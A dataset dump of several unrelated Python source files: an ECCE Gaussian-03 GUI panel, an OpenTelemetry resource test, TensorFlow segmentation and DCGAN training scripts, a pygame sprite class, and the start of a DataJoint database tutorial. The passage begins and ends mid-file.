\"RQCISD\" or\n EcceGlobals.Theory == \"UQCISD\"))):\n self.hessianChoice = [\"Valence Force Field\",\n \"Calculate\"]\n else:\n self.hessianChoice = [\"Valence Force Field\"]\n self.hessian = EcceComboBox(self,\n choices = self.hessianChoice,\n name = \"ES.Runtype.GeomOpt.InitialHessian\",\n default = 1,\n label = \"Initial Source:\")\n hessianSizer.AddWidget(self.hessian)\n \n self.panelSizer.Add(geometrySizer)\n self.panelSizer.Add(convergenceSizer)\n self.panelSizer.Add(hessianSizer)\n \n if EcceGlobals.RunType == \"Polarizability\":\n polarSizer = EcceBoxSizer(self,\n label = \"Polarizability\",\n cols = 1)\n\n if (EcceGlobals.Theory == \"RHF\" or\n EcceGlobals.Theory == \"UHF\" or\n EcceGlobals.Category == \"DFT\" or\n EcceGlobals.Theory == \"RMP2\" or\n EcceGlobals.Theory == \"UMP2\"):\n polarMethodChoice = [\"Analytic Polariz. + Hyperpol.\",\n \"Numerical Polariz.\"]\n elif (EcceGlobals.Theory == \"ROHF\" or\n (EcceGlobals.Category == \"MP\" and\n (EcceGlobals.Theory == \"RMP3\" or\n EcceGlobals.Theory == \"UMP3\" or\n EcceGlobals.Theory == \"RMP4(SDQ)\" or\n EcceGlobals.Theory == \"UMP4(SDQ)\")) or\n EcceGlobals.Category == \"CI\" or\n (EcceGlobals.Category == \"CC\" and\n (EcceGlobals.Theory == \"RQCISD\" or\n EcceGlobals.Theory == \"UQCISD\" or\n EcceGlobals.Theory == \"RCCD\" or\n EcceGlobals.Theory == \"UCCD\"))):\n polarMethodChoice = [\"Numerical Polariz.\",\n \"Numerical Polariz. + Hyperpol.\"]\n else:\n polarMethodChoice = [\"Numerical Polariz.\"]\n self.polarMethod = EcceComboBox(self,\n choices = polarMethodChoice,\n name = \"ES.Runtype.Polar.Method\",\n default = 0,\n label = \"Method:\")\n polarSizer.AddWidget(self.polarMethod)\n \n self.efstepInput = EcceFloatInput(self,\n unit = \"AU\",\n name = \"ES.Runtype.Polar.EFieldStepSize\",\n default = 0.0019,\n hardRange = \"[0..)\",\n softRange = \"[1e-5..1e-2]\",\n label = \"Electric Field Step Size:\")\n polarSizer.AddWidget(self.efstepInput)\n\n self.panelSizer.Add(polarSizer)\n\n if (EcceGlobals.RunType == \"Vibration\" or\n EcceGlobals.RunType == \"GeoVib\"):\n vibSizer = EcceBoxSizer(self, \"IR/Raman\", 1)\n vibMethodEnable = True\n if (EcceGlobals.Theory == \"RHF\" or\n EcceGlobals.Theory == \"UHF\" or\n EcceGlobals.Category == \"DFT\" or\n EcceGlobals.Theory == \"RMP2\" or\n EcceGlobals.Theory == \"UMP2\" or\n EcceGlobals.Theory == \"CIS\"):\n vibMethodChoice = [\"Analytic\",\n \"Numerical 2nd Derivative\",\n \"Numerical 1st and 2nd Derivative\"]\n elif (EcceGlobals.Theory == \"ROHF\" or\n EcceGlobals.Theory == \"RMP3\" or\n EcceGlobals.Theory == \"UMP3\" or\n EcceGlobals.Theory == \"RMP4(SDQ)\" or\n EcceGlobals.Theory == \"UMP4(SDQ)\" or\n EcceGlobals.Theory == \"RMP4(DQ)\" or\n EcceGlobals.Theory == \"RMP4(DQ)\" or\n EcceGlobals.Theory == \"UMP4(DQ)\" or\n EcceGlobals.Theory == \"RQCISD\" or\n EcceGlobals.Theory == \"UQCISD\" or\n EcceGlobals.Theory == \"RCCD\" or\n EcceGlobals.Theory == \"UCCD\" or\n EcceGlobals.Theory == \"CISD\"):\n vibMethodChoice = [\"Numerical 2nd Derivative\",\n \"Numerical 1st and 2nd Derivative\"]\n elif (EcceGlobals.Theory == \"RMP4\" or\n EcceGlobals.Theory == \"UMP4\" or\n EcceGlobals.Theory == \"RQCISD(T)\" or\n EcceGlobals.Theory == \"UQCISD(T)\" or\n EcceGlobals.Theory == \"RCCSD\" or\n EcceGlobals.Theory == \"UCCSD\" or\n EcceGlobals.Theory == \"RCCSD(T)\" or\n EcceGlobals.Theory == \"UCCSD(T)\"):\n vibMethodChoice = [\"Numerical 1st and 2nd Derivative\"]\n elif (EcceGlobals.Category == \"SE\"):\n vibMethodChoice = [\"Analytic\",\n \"Numerical 2nd Derivative\"]\n else:\n vibMethodChoice = [\"Numerical 1st and 2nd Derivative\"]\n vibMethodEnable = False\n\n self.vibMethod = EcceComboBox(self,\n choices = vibMethodChoice,\n name = \"ES.Runtype.Vibration.Method\",\n default = 0,\n label = \"Method:\")\n self.vibMethod.Enable(vibMethodEnable)\n vibSizer.AddWidget(self.vibMethod)\n\n self.fdStep = EcceFloatInput(self,\n unit = \"Angstrom\",\n name = \"ES.Runtype.Vibration.FiniteStepSize\",\n default = 0.001,\n hardRange = \"(0..)\",\n softRange = \"(0..0.1]\",\n label = \"FD Step Size:\")\n vibSizer.AddWidget(self.fdStep)\n\n self.panelSizer.Add(vibSizer)\n if EcceGlobals.RunType == \"Magnetic\":\n magneticSizer = EcceBoxSizer(self,\n label = \"Magnetic/NMR\",\n cols = 1)\n\n magneticMethodChoice = [\"Gauge-Independent Atomic Orbitals\",\n \"Continuous Set of Gauge Transformations\",\n \"Atoms-In-Molecules Gauge\",\n \"Single Origin\"]\n self.magneticMethod = EcceComboBox(self,\n choices = magneticMethodChoice,\n name = \"ES.Runtype.Magnetic.Method\",\n default = 0,\n label = \"Method:\")\n magneticSizer.AddWidget(self.magneticMethod)\n\n self.panelSizer.Add(magneticSizer)\n\n self.AddButtons()\n\n def CheckDependency(self):\n if (EcceGlobals.RunType == \"Geometry\" or\n EcceGlobals.RunType == \"GeoVib\"):\n self.stepSpin.Enable(self.stepCheckBox.GetValue())\n if (len(self.hessianChoice) == 2 and\n self.find.GetSelection() == 1):\n self.hessian.SetSelection(1)\n if EcceGlobals.RunType == \"Polarizability\":\n self.efstepInput.Enable(self.polarMethod.GetValue() !=\n \"Analytic Polariz. + Hyperpol.\")\n if (EcceGlobals.RunType == \"Vibration\" or\n EcceGlobals.RunType == \"GeoVib\"):\n self.fdStep.Enable(self.vibMethod.GetValue() != \"Analytic\")\n\n\nframe = Ged03RunTypeFrame(None,\n title = \"ECCE Gaussian-03 Editor: Runtype Details\",\n app = app,\n helpURL = \"\")\n","sub_path":"scripts/codereg/ged03runtype.py","file_name":"ged03runtype.py","file_ext":"py","file_size_in_byte":13512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"435981821","text":"# Copyright The OpenTelemetry Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# pylint: disable=protected-access\n\nimport unittest\n\nfrom opentelemetry.sdk import resources\n\n\nclass TestResources(unittest.TestCase):\n def test_create(self):\n labels = {\n \"service\": \"ui\",\n \"version\": 1,\n \"has_bugs\": True,\n \"cost\": 112.12,\n }\n\n resource = resources.Resource.create(labels)\n self.assertIsInstance(resource, resources.Resource)\n self.assertEqual(resource.labels, labels)\n\n resource = resources.Resource.create_empty()\n self.assertIs(resource, resources._EMPTY_RESOURCE)\n\n resource = resources.Resource.create(None)\n self.assertIs(resource, resources._EMPTY_RESOURCE)\n\n resource = resources.Resource.create({})\n self.assertIs(resource, resources._EMPTY_RESOURCE)\n\n def test_resource_merge(self):\n left = resources.Resource({\"service\": \"ui\"})\n right = resources.Resource({\"host\": \"service-host\"})\n self.assertEqual(\n left.merge(right),\n resources.Resource({\"service\": \"ui\", \"host\": \"service-host\"}),\n )\n\n def test_resource_merge_empty_string(self):\n \"\"\"Verify Resource.merge behavior with the empty string.\n\n Labels from the source Resource take precedence, with\n the exception of the empty string.\n\n \"\"\"\n left = resources.Resource({\"service\": \"ui\", \"host\": \"\"})\n right = resources.Resource(\n {\"host\": \"service-host\", \"service\": \"not-ui\"}\n )\n self.assertEqual(\n left.merge(right),\n resources.Resource({\"service\": \"ui\", \"host\": \"service-host\"}),\n )\n\n def test_immutability(self):\n labels = {\n \"service\": \"ui\",\n \"version\": 1,\n \"has_bugs\": True,\n \"cost\": 112.12,\n }\n\n labels_copy = labels.copy()\n\n resource = resources.Resource.create(labels)\n self.assertEqual(resource.labels, labels_copy)\n\n resource.labels[\"has_bugs\"] = False\n self.assertEqual(resource.labels, labels_copy)\n\n labels[\"cost\"] = 999.91\n self.assertEqual(resource.labels, labels_copy)\n","sub_path":"opentelemetry-sdk/tests/resources/test_resources.py","file_name":"test_resources.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"523870817","text":"import os\nimport sys\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport glob\nimport random\nimport pdb\nimport time\n\n# basic parameters\nlayers = 8\nstride = 1\npool = 2\nlearning_rate = 1.0e-4\nepochs = 1000000\ntrain_batch_size = 5\nimg_hsize = 128 \nimg_wsize = 128\nnum_channels = 3\nnum_classes = 2\ntrain_rate = 0.999\n\n# construct networks\n# layers\nfeatures1 = num_channels\nx = tf.placeholder(tf.float32,[None,img_hsize,img_wsize,features1])\n\nfeatures2 = 32\n\nfeatures3 = 64\n\nfeatures4 = 128\n\nfeatures5 = 256\n\nfeatures6 = 512\n\nfeatures_fc1 = 800\n\nfeatures_fc2 = num_classes\ny_ = tf.placeholder(tf.int32,[None,img_hsize,img_wsize,1])\n\n# linkers\ndef weight_init(shape):\t#weight initialization function, wight number ~ nodes\n\tinit_value = tf.truncated_normal(shape,stddev=0.05)\n\treturn tf.Variable(init_value)\ndef bias_init(shape):\t#bias initialization function, bias number ~ latter features\n\tinit_value = tf.constant(0.05,shape=shape)\n\treturn tf.Variable(init_value)\n\nfilter1 = 5\nW_conv1 = weight_init([filter1,filter1,features1,features2])\nb_conv1 = bias_init([features2])\n\nfilter2 = 5\nW_conv2 = weight_init([filter2,filter2,features2,features3])\nb_conv2 = bias_init([features3])\n\nfilter3 = 5\nW_conv3 = weight_init([filter3,filter3,features3,features4])\nb_conv3 = bias_init([features4])\n\nfilter4 = 5\nW_conv4 = weight_init([filter4,filter4,features4,features5])\nb_conv4 = bias_init([features5])\n\nfilter5 = 5\nW_conv5 = weight_init([filter5,filter5,features5,features6])\nb_conv5 = bias_init([features6])\n\nW_fc1 = weight_init([img_hsize//pow(pool,(layers-3))*img_wsize//pow(pool,(layers-3))*features6,features_fc1])\nb_fc1 = bias_init([features_fc1])\n\nW_fc2 = weight_init([features_fc1, features_fc2])\nb_fc2 = bias_init([features_fc2])\n\n# operation\ndef conv2d(x,W,stride):\n\treturn tf.nn.conv2d(x,W,strides=[1,stride,stride,1],padding='SAME')\ndef max_pool_2x2(x,pool):\n\treturn tf.nn.max_pool(x,ksize=[1,pool,pool,1],strides=[1,pool*stride,pool*stride,1],padding='SAME')\n\nh_conv1 = tf.nn.relu(conv2d(x,W_conv1,stride)+b_conv1)\nh_pool1 = max_pool_2x2(h_conv1,pool)\n\nh_conv2 = tf.nn.relu(conv2d(h_pool1,W_conv2,stride)+b_conv2)\nh_pool2 = max_pool_2x2(h_conv2,pool)\n\nh_conv3 = tf.nn.relu(conv2d(h_pool2,W_conv3,stride)+b_conv3)\nh_pool3 = max_pool_2x2(h_conv3,pool)\n\nh_conv4 = tf.nn.relu(conv2d(h_pool3,W_conv4,stride)+b_conv4)\nh_pool4 = max_pool_2x2(h_conv4,pool)\n\nh_conv5 = tf.nn.relu(conv2d(h_pool4,W_conv5,stride)+b_conv5)\nh_pool5 = max_pool_2x2(h_conv5,pool)\n\nh_pool5_flat = tf.reshape(h_pool5,[-1,img_hsize//pow(pool,(layers-3))*img_wsize//pow(pool,(layers-3))*features6])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool5_flat,W_fc1)+b_fc1)\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1,keep_prob)\n\ny_conv = tf.nn.softmax(tf.matmul(h_fc1_drop,W_fc2)+b_fc2)\n\n# get weight data\nsaver = tf.train.Saver()\nwith tf.Session() as sess1:\n\tsaver.restore(sess1, tf.train.latest_checkpoint('RECG_model3/'))\n\tW1_data = sess1.run(W_conv1)\n\tb1_data = sess1.run(b_conv1)\n\tW2_data = sess1.run(W_conv2)\n\tb2_data = sess1.run(b_conv2)\n\tW3_data = sess1.run(W_conv3)\n\tb3_data = sess1.run(b_conv3)\nhconv1_data = tf.nn.relu(conv2d(x,W1_data,stride)+b1_data)\nhpool1_data = max_pool_2x2(hconv1_data,pool)\nhconv2_data = tf.nn.relu(conv2d(hpool1_data,W2_data,stride)+b2_data)\nhpool2_data = max_pool_2x2(hconv2_data,pool)\nhconv3_data = tf.nn.relu(conv2d(hpool2_data,W3_data,stride)+b3_data)\nhpool3_data = max_pool_2x2(hconv3_data,pool)\n\n# pool5 to t_pool3 layer\nW_t3 = weight_init([filter5,filter5,features4,features6])\nb_t3 = bias_init([features4])\nconv_t3 = tf.nn.conv2d_transpose(h_pool5,W_t3,tf.shape(h_pool3),strides=[1,4,4,1],padding='SAME')+b_t3\nfuse_3 = tf.add(conv_t3,hpool3_data)\n\n# pool3 to t_pool1 layer\nW_t1 = weight_init([filter3,filter3,features2,features4])\nb_t1 = bias_init([features2])\nconv_t1 = tf.nn.conv2d_transpose(fuse_3,W_t1,tf.shape(h_pool1),strides=[1,4,4,1],padding='SAME')+b_t1\nfuse_1 = tf.add(conv_t1,hpool1_data)\n\n# pool1 to t_original image layer\nW_t0 = weight_init([filter1,filter1,num_classes,features2])\nb_t0 = bias_init([num_classes])\nx_shape = tf.shape(x)\ndeconv_shape = tf.stack([x_shape[0],x_shape[1],x_shape[2],num_classes])\nconv_t0 = tf.nn.conv2d_transpose(fuse_1,W_t0,deconv_shape,strides=[1,2,2,1],padding='SAME')+b_t0\nannotation_pred = tf.expand_dims(tf.argmax(conv_t0,axis=3), dim=3)\n\nloss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=conv_t0,\n\tlabels=tf.squeeze(y_,squeeze_dims=[3])))\n\ntrainable_var = tf.trainable_variables()\noptimizer = tf.train.AdamOptimizer(learning_rate)\ngrads= optimizer.compute_gradients(loss,trainable_var)\ntrain_op = optimizer.apply_gradients(grads)\n\n# load data\ntrain_images = glob.glob('cutout_train_data/images/*')\ntrain_annotations = glob.glob('cutout_train_data/annotations/*')\nvalid_images = glob.glob('cutout_valid_data/images/*')\nvalid_annotations = glob.glob('cutout_valid_data/annotations/*')\n# prepare for minibatch\ndef next_batch(img_names,ann_names,batch_size):\n\t# indexs = [random.randint(0,len(img_names)-1) for _ in range(batch_size)]\n\tindexs = random.sample(range(0,len(img_names)-1),batch_size)\n\timages = []\n\tannots = []\n\tfor index in indexs:\n\t\timage = cv2.imread(img_names[index],flags=1)\n\t\tannot = cv2.imread(ann_names[index],flags=0)\n\t\timage = cv2.resize(image,(img_wsize,img_hsize),0,0,cv2.INTER_AREA)\n\t\timage = image.astype(np.float32)\n\t\timage = np.multiply(image,1.0/255.0)\n\t\timages.append(image)\n\t\tannot = cv2.resize(annot,(img_wsize,img_hsize),0,0,cv2.INTER_AREA)\n\t\tannot = annot.reshape((img_hsize,img_wsize,1))\n\t\tannot = annot.astype(np.float32)\n\t\tannot = np.multiply(annot,1.0/255.0)\n\t\tannots.append(annot)\n\timages = np.array(images)\n\tannots = np.array(annots)\n\treturn images, annots\n\n# training\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\nwith tf.Session() as sess:\n\tif sys.argv[1] == 'train':\n\t\tsess.run(init)\n\t\tfor i in range(epochs):\n\t\t\ttrain_batch = next_batch(train_images,train_annotations,train_batch_size)\n\t\t\tfeed_dict = {x:train_batch[0],y_:train_batch[1],keep_prob:1.0}\n\t\t\tsess.run(train_op,feed_dict=feed_dict)\n\t\t\tif (i+1)%50 == 0:\n\t\t\t\ttrain_loss = sess.run(loss,feed_dict=feed_dict)\n\t\t\t\tprint('step %d, train loss: %g'%(i+1,train_loss))\n\t\t\t\tsaver.save(sess,'CUTOUT_model/cutout.cpk',global_step=i+1)\n\t\t\t# save the predication of the last epoch\n\t\t\tif (i+1) == epochs:\n\t\t\t\tpred = sess.run(annotation_pred,feed_dict={x:train_batch[0],keep_prob:1.0})\n\t\t\t\tpred = np.squeeze(pred,axis=3)\n\t\t\t\tfor j in range(train_batch_size):\n\t\t\t\t\timg_save = pred[j]*255\n\t\t\t\t\tcv2.imwrite(os.path.join('CUTOUT_model/img/',str(j)+'.jpg'),img_save)\n\telif sys.argv[1] == 'predict':\n\t\t# testing image\n\t\ttest0 = cv2.imread(\"test/test.jpg\",flags=1)\n\n\t\tfor k in range(1):\n\t\t\t# resize to (128,128)\n\t\t\ttest = cv2.resize(test0,(img_wsize,img_hsize),0,0,cv2.INTER_AREA)\n\t\t\ttest = test.astype(np.float32)\n\t\t\ttest = np.multiply(test,1.0/255.0)\n\t\t\t# convert to the shape for tensorflow placeholder\n\t\t\ttest = test.reshape((1,test.shape[0],test.shape[1],test.shape[2]))\n\t\t\t# predicting\n\t\t\tsaver.restore(sess,tf.train.latest_checkpoint('CUTOUT_model/'))\n\t\t\tpred = sess.run(annotation_pred,feed_dict={x:test,keep_prob:1.0})\n\t\t\t# recover the shape for displaying image\n\t\t\ttest = np.squeeze(test,axis=0) * 255\n\t\t\tpred = np.squeeze(pred,axis=0) * 255\n\t\t\tpred = pred.astype(np.float32)\n\t\t\t# recover predication to the original size\n\t\t\tpred = cv2.resize(pred,(test0.shape[1],test0.shape[0]),0,0,cv2.INTER_CUBIC)\n\t\t\tpred = pred.reshape((pred.shape[0],pred.shape[1],1))\n\n\t\t\t# extract the ROI and save, test0 is the result\n\t\t\tfor i in range(pred.shape[0]):\n\t\t\t\tfor j in range(pred.shape[1]):\n\t\t\t\t\tif pred[i,j] == 0:\n\t\t\t\t\t\ttest0[i,j] = (255,255,255)\n\t\t\tcv2.imwrite(\"test/annot\"+str(k)+\".jpg\",test0)\n\t# elif sys.argv[1] == 'predict2':\n\t# \t# source image\n\t# \ttest = cv2.imread(\"test/test.jpg\",flags=1)\n\t# \ttest = cv2.resize(test,(img_wsize,img_hsize),0,0,cv2.INTER_LINEAR)\n\t# \ttest = test.astype(np.float32)\n\t# \ttest = np.multiply(test,1.0/255.0)\n\t# \ttest = test.reshape((1,test.shape[0],test.shape[1],test.shape[2]))\n\n\t# \t# label\n\t# \ttest_annot = cv2.imread(\"test/test_annot.jpg\",flags=0)\n\t# \ttest_annot = cv2.resize(test_annot,(img_wsize,img_hsize),0,0,cv2.INTER_LINEAR)\n\t# \ttest_annot = test_annot.reshape((img_wsize,img_hsize,1))\n\t# \ttest_annot = test_annot.astype(np.float32)\n\t# \ttest_annot = np.multiply(test_annot,1.0/255.0)\n\t# \ttest_annot = test_annot.reshape((1,test_annot.shape[0],test_annot.shape[1],test_annot.shape[2]))\n\n\t# \tsaver.restore(sess,tf.train.latest_checkpoint('CUTOUT_model/'))\n\t# \tpred = sess.run(annotation_pred,feed_dict={x:test,keep_prob:1.0})\n\n\t# \tpredict_loss2 = sess.run(loss,feed_dict={x:test,y_:pred,keep_prob:1.0})\n\t# \tpredict_loss = sess.run(loss,feed_dict={x:test,y_:test_annot,keep_prob:1.0})\n\t# \tprint(predict_loss)\n\t# \tprint(predict_loss2)\n\n\t# \tpred = np.squeeze(pred,axis=0)\n\t# \tpred = pred * 255\n\t# \ttest = np.squeeze(test,axis=0) * 255\n\n\t# \tresult = pred*test/255\n\t# \tfor i in range(img_hsize):\n\t# \t\tfor j in range(img_wsize):\n\t# \t\t\tif all(result[i,j]) == 0:\n\t# \t\t\t\tresult[i,j] = (255,255,255)\n\n\t# \tcv2.imwrite(\"test/image.jpg\",test)\n\t# \tcv2.imwrite(\"test/annot.jpg\",result)","sub_path":"CUTOUT_FCN.py","file_name":"CUTOUT_FCN.py","file_ext":"py","file_size_in_byte":9107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"258470093","text":"import os\nimport random\nimport numpy as np\nimport pylab as plt\n\nimport sys\nimport csgan as cs\n\n\n\nfile_list = ['../../dataset/map1n_allz_rtaapixlw_2048_'+str(i)+'.fits' for i in range(1,4)]\ndp = cs.Data_Provider(file_list,preprocess_mode=2)\n\n#dt = filt_all(dp(10,128),func)\n#dt.shape\n#fig,(ax1,ax2)=plt.subplots(1,2,figsize=(8,18))\n#ax1.imshow(dt[0,:,:,0])\n#ax2.imshow(dt[0,:,:,1])\n\n\nbatch_size = 64\nimage_size = 256\ncheckpoint_dir = './checkpoint/'+sys.argv[0][:-3]\nsample_dir = './samples/'+sys.argv[0][:-3]\n\ndef dpp(n):\n# return dp(n,image_size).reshape(n,image_size,image_size,1)\n return filt_all(dp(n,image_size),func)\n\n# defult_model_build lets you to define your own generator and discriminator. \n# Set it to 1, if you want to use default DCGAN architecture.\nimport tensorflow as tf\n\ndef discriminator(image, reuse=False):\n with tf.variable_scope(\"discriminator\") as scope:\n if reuse:\n scope.reuse_variables()\n\n trainable = 1\n\n h0 = tf.layers.conv2d(inputs=image, filters=dcgan.df_dim, kernel_size=[5,5], \n strides=(2,2),padding='same',\n activation=tf.nn.relu, name='d_h0_conv')\n\n h1 = tf.layers.conv2d(inputs=h0, filters=2*dcgan.df_dim, kernel_size=[5,5], \n strides=(2,2),padding='same',\n activation=None, name='d_h1_conv')\n h1 = tf.contrib.layers.batch_norm(h1,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn1')\n h1 = tf.nn.relu(h1)\n\n h2 = tf.layers.conv2d(inputs=h1, filters=4*dcgan.df_dim, kernel_size=[5,5], \n strides=(2,2),padding='same',\n activation=None, name='d_h2_conv')\n h2 = tf.contrib.layers.batch_norm(h2,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn2')\n h2 = tf.nn.relu(h2)\n\n h3 = tf.layers.conv2d(inputs=h2, filters=8*dcgan.df_dim, kernel_size=[5,5], \n strides=(2,2),padding='same',\n activation=None, name='d_h3_conv')\n h3 = tf.contrib.layers.batch_norm(h3,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn3')\n h3 = tf.nn.relu(h3)\n \n h4 = tf.layers.conv2d(inputs=h3, filters=8*dcgan.df_dim, kernel_size=[5,5], \n strides=(2,2),padding='same',\n activation=None, name='d_h4_conv')\n h4 = tf.contrib.layers.batch_norm(h4,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn4')\n h4 = tf.nn.relu(h4)\n\n h5 = tf.layers.dense(inputs=tf.reshape(h4, [dcgan.batch_size, -1]),\n units=1,kernel_initializer=tf.random_normal_initializer(stddev=0.02), \n bias_initializer=tf.constant_initializer (0.01),\n use_bias=1,activation=None,name='d_h5_lin')\n\n return tf.nn.sigmoid(h5), h5\n\ndef generator(z, batch_size, mode='train'):\n with tf.variable_scope(\"generator\") as scope:\n if mode=='train':\n trainable = True\n pass\n elif mode=='sampler':\n trainable = False\n scope.reuse_variables()\n else:\n assert 0,'Unkown mode for generator.'\n\n s_h, s_w = dcgan.output_height, dcgan.output_width\n s_h2, s_w2 = cs.conv_out_size_same(s_h, 2), cs.conv_out_size_same(s_w, 2)\n s_h4, s_w4 = cs.conv_out_size_same(s_h2, 2), cs.conv_out_size_same(s_w2, 2)\n s_h8, s_w8 = cs.conv_out_size_same(s_h4, 2), cs.conv_out_size_same(s_w4, 2)\n s_h16, s_w16 = cs.conv_out_size_same(s_h8, 2), cs.conv_out_size_same(s_w8, 2)\n\n # assert s_h16*s_w16*self.gf_dim*8==z.shape[1],str(s_h16*s_w16*self.gf_dim*8)+' != '+str(z.shape[1])\n\n # project `z` and reshape\n dcgan.z_ = tf.layers.dense(z,dcgan.gf_dim * 8 * s_h16 * s_w16,\n kernel_initializer=tf.random_normal_initializer(stddev=0.02), \n bias_initializer=tf.constant_initializer (0.01),\n use_bias=1,activation=None,name='g_h0_lin')\n with tf.variable_scope('g_h0_lin', reuse=True):\n dcgan.h0_w = tf.get_variable('kernel')\n dcgan.h0_b = tf.get_variable('bias')\n dcgan.h0 = tf.reshape(dcgan.z_, [batch_size, s_h16, s_w16, dcgan.gf_dim * 8])\n h0 = tf.contrib.layers.batch_norm(dcgan.h0,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='g_bn0')\n h0 = tf.nn.relu(h0)\n\n dcgan.h1, dcgan.h1_w, dcgan.h1_b = cs.deconv2d(h0, [batch_size, s_h8, s_w8, dcgan.gf_dim * 4], \n name='g_h1', with_w=True)\n h1 = tf.contrib.layers.batch_norm(dcgan.h1,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='g_bn1')\n h1 = tf.nn.relu(h1) \n\n h2, dcgan.h2_w, dcgan.h2_b = cs.deconv2d(h1, [batch_size, s_h4, s_w4, dcgan.gf_dim * 2],\n name='g_h2', with_w=True)\n h2 = tf.contrib.layers.batch_norm(h2,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='g_bn2')\n h2 = tf.nn.relu(h2) \n\n h3, dcgan.h3_w, dcgan.h3_b = cs.deconv2d(h2, [batch_size, s_h2, s_w2, dcgan.gf_dim * 1],\n name='g_h3', with_w=True)\n h3 = tf.contrib.layers.batch_norm(h3,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='g_bn3')\n h3 = tf.nn.relu(h3) \n\n h4, dcgan.h4_w, dcgan.h4_b = cs.deconv2d(h3, [batch_size, s_h, s_w, 4*dcgan.c_dim],\n name='g_h4', with_w=True)\n \n h5 = tf.layers.conv2d(inputs=h4, filters=2*dcgan.c_dim, kernel_size=[5,5], \n strides=(1,1),padding='same',\n activation=None, name='g_h5')\n h5 = tf.contrib.layers.batch_norm(h5,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn5')\n h5 = tf.nn.relu(h5)\n \n h6 = tf.layers.conv2d(inputs=h5, filters=dcgan.c_dim, kernel_size=[5,5], \n strides=(1,1),padding='same',\n activation=None, name='d_h6_conv')\n h6 = tf.contrib.layers.batch_norm(h6,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn6')\n\n return tf.nn.tanh(h6)\n \ndcgan.discriminator = discriminator\ndcgan.generator = generator\ndcgan.build_model()\n\n\ndcgan = cs.DCGAN(\n data_provider = dp,\n batch_size=64, gf_dim=64, df_dim=64,\n label_real_lower=.9, label_fake_upper=.1,\n z_dim=2048,checkpoint_dir=checkpoint_dir,\n save_per = 100, defult_model_build=defult_model_build)\n\ndcgan.train(num_epoch=100000,batch_per_epoch=50,verbose=10,\\\nlearning_rate=1e-4,D_update_per_batch=1,G_update_per_batch=1,\\\nsample_dir=sample_dir,checkpoint_dir=checkpoint_dir,time_limit=600)\n","sub_path":"scripts/hist/SDCGAN.py","file_name":"SDCGAN.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642634597","text":"#! /usr/bin/env python\nimport pygame\n\n#Clase para el Camino\nclass Montana(pygame.sprite.Sprite):\n\tdef __init__(self,posx,posy):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.imagenMontana = pygame.image.load('img/montana.jpg')\n\t\tself.rect = self.imagenMontana.get_rect()\n\t\tself.visible = False\t\n\t\tself.rect.top = posy\n\t\tself.rect.left = posx\n\t\tself.costo = (99,99)\n\t\t\n\tdef dibujar(self,superficie):\n\t\tsuperficie.blit(self.imagenMontana, self.rect)","sub_path":"Practica3/Mundo/Clases/Montana.py","file_name":"Montana.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"482087830","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # An example of a data pipeline written in datajoint\n\n# Datajoint is a tool to describe relational databases in python or matlab. It allows scientists, who are often not very experienced with databases, to communication with a SQL database. Some more info can be found here:\n# \n# https://tutorials.datajoint.io/\n# \n# https://docs.datajoint.io/python/\n\n# In[1]:\n\n\nimport datajoint as dj\nimport pylab as pl\nimport numpy as np\nfrom scipy import stats\n\n\n# After installing a local SQL server [like MariaDB] you should be able to connect to it.\n\n# In[2]:\n\n\ndj.conn()\n\n\n# ## 1) Defining the relational structure of the database\n\n# Define the schema to work in\n\n# In[3]:\n\n\nschema = dj.schema('manuel_test')\n\n\n# And the relational structure of the database. This database contains users that run experiments. Every experiment contains a data set with datapoints; these datapoints are analyzed and the result saved back in the database.\n# \n# There are four allowed types of tables: Lookup, Manual, Imported and Part. The construction of the database is done by the definitions in the definition string. Lookup and Manual allow to specify all relevant components. Imported and computed run a function to populate the database automatically\n\n# In[4]:\n\n\n@schema\nclass User(dj.Lookup):\n definition = \"\"\"\n # users in the lab\n username : varchar(20) # user in the lab\n ---\n first_name : varchar(20) # user first name\n last_name : varchar(20) # user last name\n \"\"\"\n contents = [\n ['Angus', 'Angus', 'Macguyver'],\n ['John', 'John', 'Doe'],\n ]\n\n@schema\nclass Experiment(dj.Manual):\n definition = \"\"\" # A simple experiment.\n -> User\n experiment : int # allowed here are sql datatypes.\n ----\n \"\"\"\n \n@schema\nclass Set(dj.Imported):\n definition = \"\"\"\n # A set of datapoints\n -> Experiment\n -----\n \"\"\"\n\n class 